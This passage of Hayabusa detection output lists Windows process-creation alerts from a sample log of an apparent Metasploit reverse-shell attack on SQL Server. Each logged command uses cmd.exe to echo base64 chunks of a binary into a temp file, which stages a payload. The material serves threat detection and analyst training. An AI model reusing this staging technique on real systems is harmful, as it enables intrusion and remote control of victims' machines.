OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo IDE5OTYgQWRhbSBUd2lzcywgWmV1cyBUZWNobm9sb2d5IEx0ZCwgaHR0cDovL3d3dy56ZXVzdGVjaC5uZXQvPGJyPgoAACBUaGlzIGlzIEFwYWNoZUJlbmNoLCBWZXJzaW9uICVzIDxpPiZsdDslcyZndDs8L2k+PGJyPgoAJFJldmlzaW9uOiA2NTU2NTQgJAA8cD4KAAAAAAAAAABMaWNlbnNlZCB0byBUaGUgQXBhY2hlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy8KAAAAAABDb3B5cmlnaHQgMTk5NiBBZGFtIFR3aXNzLCBaZXVzIFRlY2hub2xvZ3kgTHRkLCBodHRwOi8vd3d3LnpldXN0ZWNoLm5ldC8KAAAAVGhpcyBpcyBBcGFjaGVCZW5jaCwgVmVyc2lvbiAlcwoAAAAAMi4zIDwkUmV2aXNpb246IDY1NTY1NCAkPgAAACAgICAtaCAgICAgICAgICAgICAgRGlzcGxheSB1c2FnZSBpbmZvcm1hdGlvbiAodGhpcyBtZXNzYWdlKQoAAAAgICAgLXIgICAgICAgICAgICAgIERvbid0IGV4aXQgb24gc29ja2V0IHJlY2VpdmUgZXJyb3JzLgoAAAAgICAgLWUgZmlsZW5hbWUgICAgIE91dHB1dCBDU1YgZmlsZSB3aXRoIHBlcmNlbnRhZ2VzIHNlcnZlZAoAAAAAICAgIC1nIGZpbGVuYW1lICAgICBPdXRwdXQgY29sbGVjdGVkIGRhdGEgdG8gZ251cGxvdCBmb3JtYXQgZmlsZS4KAAAAAAAAICAgIC1TICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBjb25maWRlbmNlIGVzdGltYXRvcnMgYW5kIHdhcm5pbmdzLgoAAAAAICAgIC1kICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBwZXJjZW50aWxlcyBzZXJ2ZWQgdGFibGUuCgAAICAgIC1rICAgICAgICAgICAgICBVc2UgSFRUUCBLZWVwQWxpdmUgZmVhdHVyZQoAICAgIC1WICAgICAgICAgICAgICBQcmludCB2ZXJzaW9uIG51bWJlciBhbmQgZXhpdAoAACAgICAtWCBwcm94eTpwb3J0ICAgUHJveHlzZXJ2ZXIgYW5kIHBvcnQgbnVtYmVyIHRvIHVzZQoAICAgIC1QIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgUHJveHkgQXV0aGVudGljYXRpb24sIHRoZSBhdHRyaWJ1dGVzCgAAAAAAICAgICAgICAgICAgICAgICAgICBhcmUgYSBjb2xvbiBzZXBhcmF0ZWQgdXNlcm5hbWUgYW5kIHBhc3N3b3JkLgoAAAAAAAAAICAgIC1BIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgV1dXIEF1dGhlbnRpY2F0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aW9uLCB0aGUgYXR0cmlidXRlcwoAAAAAAAAAICAgICAgICAgICAgICAgICAgICBJbnNlcnRlZCBhZnRlciBhbGwgbm9ybWFsIGhlYWRlciBsaW5lcy4gKHJlcGVhdGFibGUpCgAAAAAAAAAgICAgLUggYXR0cmlidXRlICAgIEFkZCBBcmJpdHJhcnkgaGVhZGVyIGxpbmUsIGVnLiAnQWNjZXB0LUVuY29kaW5nOiBnemlwJwoAAAAAACAgICAtQyBhdHRyaWJ1dGUgICAgQWRkIGNvb2tpZSwgZWcuICdBcGFjaGU9MTIzNC4gKHJlcGVhdGFibGUpCgAgICAgLXogYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGQgb3IgdGggYXR0cmlidXRlcwoAAAAAICAgIC15IGF0dHJpYnV0ZXMgICBTdHJpbmcgdG8gaW5zZXJ0IGFzIHRyIGF0dHJpYnV0ZXMKAAAgICAgLXggYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGFibGUgYXR0cmlidXRlcwoAAAAgICAgLWkgICAgICAgICAgICAgIFVzZSBIRUFEIGluc3RlYWQgb2YgR0VUCgAAAAAgICAgLXcgICAgICAgICAgICAgIFByaW50IG91dCByZXN1bHRzIGluIEhUTUwgdGFibGVzCgAAACAgICAtdiB2ZXJib3NpdHkgICAgSG93IG11Y2ggdHJvdWJsZXNob290aW5nIGluZm8gdG8gcHJpbnQKACAgICAgICAgICAgICAgICAgICAgRGVmYXVsdCBpcyAndGV4dC9wbGFpbicKAAAAACAgICAgICAgICAgICAgICAgICAgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKAAAAACAgICAtVCBjb250ZW50LXR5cGUgQ29udGVudC10eXBlIGhlYWRlciBmb3IgUE9TVGluZywgZWcuCgAAACAgICAtdSBwdXRmaWxlICAgICAgRmlsZSBjb250YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAAAAAAAAAICAgIC1wIHBvc3RmaWxlICAgICBGaWxlIGNvbnRhaW5pbmcgZGF0YSB0byBQT1NULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAACAgICAtYiB3aW5kb3dzaXplICAgU2l6ZSBvZiBUQ1Agc2VuZC9yZWNlaXZlIGJ1ZmZlciwgaW4gYnl0ZXMKAAAgICAgLXQgdGltZWxpbWl0ICAgIFNlY29uZHMgdG8gbWF4LiB3YWl0IGZvciByZXNwb25zZXMKACAgICAtYyBjb25jdXJyZW5jeSAgTnVtYmVyIG9mIG11bHRpcGxlIHJlcXVlc3RzIHRvIG1ha2UKAAAAACAgICAtbiBy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AFNvY2tldCBpcyBhbHJlYWR5IGNvbm5lY3RlZABObyBidWZmZXIgc3BhY2UgYXZhaWxhYmxlAAAAQ29ubmVjdGlvbiByZXNldCBieSBwZWVyAAAAAFNvZnR3YXJlIGNhdXNlZCBjb25uZWN0aW9uIGFib3J0AAAAAE5ldCBjb25uZWN0aW9uIHJlc2V0AAAAAE5ldHdvcmsgaXMgdW5yZWFjaGFibGUAAE5ldHdvcmsgaXMgZG93bgBDYW4ndCBhc3NpZ24gcmVxdWVzdGVkIGFkZHJlc3MAAEFkZHJlc3MgYWxyZWFkeSBpbiB1c2UAAEFkZHJlc3MgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAAAAUHJvdG9jb2wgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAABPcGVyYXRpb24gbm90IHN1cHBvcnRlZCBvbiBzb2NrZXQAAABTb2NrZXQgdHlwZSBub3Qgc3VwcG9ydGVkAAAAUHJvdG9jb2wgbm90IHN1cHBvcnRlZAAAQmFkIHByb3RvY29sIG9wdGlvbgBQcm90b2NvbCB3cm9uZyB0eXBlIGZvciBzb2NrZXQAAE1lc3NhZ2UgdG9vIGxvbmcAAAAARGVzdGluYXRpb24gYWRkcmVzcyByZXF1aXJlZAAAAABTb2NrZXQgb3BlcmF0aW9uIG9uIG5vbi1zb2NrZXQAAE9wZXJhdGlvbiBhbHJlYWR5IGluIHByb2dyZXNzAAAAT3BlcmF0aW9uIG5vdyBpbiBwcm9ncmVzcwAAAE9wZXJhdGlvbiB3b3VsZCBibG9jawAAAFRvbyBtYW55IG9wZW4gc29ja2V0cwAAAEludmFsaWQgYXJndW1lbnQAAAAAQmFkIGFkZHJlc3MAUGVybWlzc2lvbiBkZW5pZWQAAABCYWQgZmlsZSBudW1iZXIASW50ZXJydXB0ZWQgc3lzdGVtIGNhbGwAQVBSIGRvZXMgbm90IHVuZGVyc3RhbmQgdGhpcyBlcnJvciBjb2RlAEVycm9yIHN0cmluZyBub3Qgc3BlY2lmaWVkIHlldAAAcGFzc3dvcmRzIGRvIG5vdCBtYXRjaAAAVGhpcyBmdW5jdGlvbiBoYXMgbm90IGJlZW4gaW1wbGVtZW50ZWQgb24gdGhpcyBwbGF0Zm9ybQAAAAAAVGhlcmUgaXMgbm8gZXJyb3IsIHRoaXMgdmFsdWUgc2lnbmlmaWVzIGFuIGluaXRpYWxpemVkIGVycm9yIGNvZGUAAABTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGEga2V5IHN5c3RlbQBTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGZpbGVzAAAAAFNoYXJlZCBtZW1vcnkgaXMgaW1wbGVtZW50ZWQgYW5vbnltb3VzbHkAAAAAQ291bGQgbm90IGZpbmQgc3Bl>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Y2lmaWVkIHNvY2tldCBpbiBwb2xsIGxpc3QuAAAARW5kIG9mIGZpbGUgZm91bmQAAABNaXNzaW5nIHBhcmFtZXRlciBmb3IgdGhlIHNwZWNpZmllZCBjb21tYW5kIGxpbmUgb3B0aW9uAEJhZCBjaGFyYWN0ZXIgc3BlY2lmaWVkIG9uIGNvbW1hbmQgbGluZQBQYXJ0aWFsIHJlc3VsdHMgYXJlIHZhbGlkIGJ1dCBwcm9jZXNzaW5nIGlzIGluY29tcGxldGUAAFRoZSB0aW1lb3V0IHNwZWNpZmllZCBoYXMgZXhwaXJlZAAAAFRoZSBzcGVjaWZpZWQgY2hpbGQgcHJvY2VzcyBpcyBub3QgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIGNoaWxkIHByb2Nlc3MgaXMgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIHRocmVhZCBpcyBub3QgZGV0YWNoZWQAAAAAVGhlIHNwZWNpZmllZCB0aHJlYWQgaXMgZGV0YWNoZWQAAAAAAAAAAFlvdXIgY29kZSBqdXN0IGZvcmtlZCwgYW5kIHlvdSBhcmUgY3VycmVudGx5IGV4ZWN1dGluZyBpbiB0aGUgcGFyZW50IHByb2Nlc3MAAAAAWW91ciBjb2RlIGp1c3QgZm9ya2VkLCBhbmQgeW91IGFyZSBjdXJyZW50bHkgZXhlY3V0aW5nIGluIHRoZSBjaGlsZCBwcm9jZXNzAEludGVybmFsIGVycm9yAABUaGUgcHJvY2VzcyBpcyBub3QgcmVjb2duaXplZC4AAFRoZSBnaXZlbiBwYXRoIGNvbnRhaW5lZCB3aWxkY2FyZCBjaGFyYWN0ZXJzAAAAAFRoZSBnaXZlbiBwYXRoIGlzIG1pc2Zvcm1hdHRlZCBvciBjb250YWluZWQgaW52YWxpZCBjaGFyYWN0ZXJzAABUaGUgZ2l2ZW4gcGF0aCB3YXMgYWJvdmUgdGhlIHJvb3QgcGF0aAAAVGhlIGdpdmVuIHBhdGggaXMgaW5jb21wbGV0ZQAAAABUaGUgZ2l2ZW4gcGF0aCBpcyByZWxhdGl2ZQAAVGhlIGdpdmVuIHBhdGggaXMgYWJzb2x1dGUAAFRoZSBzcGVjaWZpZWQgbmV0d29yayBtYXNrIGlzIGludmFsaWQuAABUaGUgc3BlY2lmaWVkIElQIGFkZHJlc3MgaXMgaW52YWxpZC4AAAAARFNPIGxvYWQgZmFpbGVkAE5vIHNoYXJlZCBtZW1vcnkgaXMgY3VycmVudGx5IGF2YWlsYWJsZQBObyB0aHJlYWQga2V5IHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyB0aHJlYWQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABO>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo byBzb2NrZXQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABObyBwb2xsIHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAAAAAE5vIGxvY2sgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAATm8gZGlyZWN0b3J5IHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4ATm8gdGltZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyBwcm9jZXNzIHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4AAABBbiBpbnZhbGlkIHNvY2tldCB3YXMgcmV0dXJuZWQAAEFuIGludmFsaWQgZGF0ZSBoYXMgYmVlbiBwcm92aWRlZAAAAEEgbmV3IHBvb2wgY291bGQgbm90IGJlIGNyZWF0ZWQuAAAAAFVucmVjb2duaXplZCBXaW4zMiBlcnJvciBjb2RlICVkAAAAAFwAXAA/AFwAVQBOAEMAXAAAAAAAXABcAD8AXAAAAAAAQ2FuY2VsSW8AAAAAR2V0Q29tcHJlc3NlZEZpbGVTaXplQQAAR2V0Q29tcHJlc3NlZEZpbGVTaXplVwAAWndRdWVyeUluZm9ybWF0aW9uRmlsZQAAR2V0U2VjdXJpdHlJbmZvAEdldE5hbWVkU2VjdXJpdHlJbmZvQQAAAEdldE5hbWVkU2VjdXJpdHlJbmZvVwAAAFUATgBDAFwAAAAAAEdldEVmZmVjdGl2ZVJpZ2h0c0Zyb21BY2xXAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////bnRkbGwuZGxsAAAAc2hlbGwzMgB3czJfMzIAAG1zd3NvY2sAYWR2YXBpMzIAAAAAa2VybmVsMzIAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA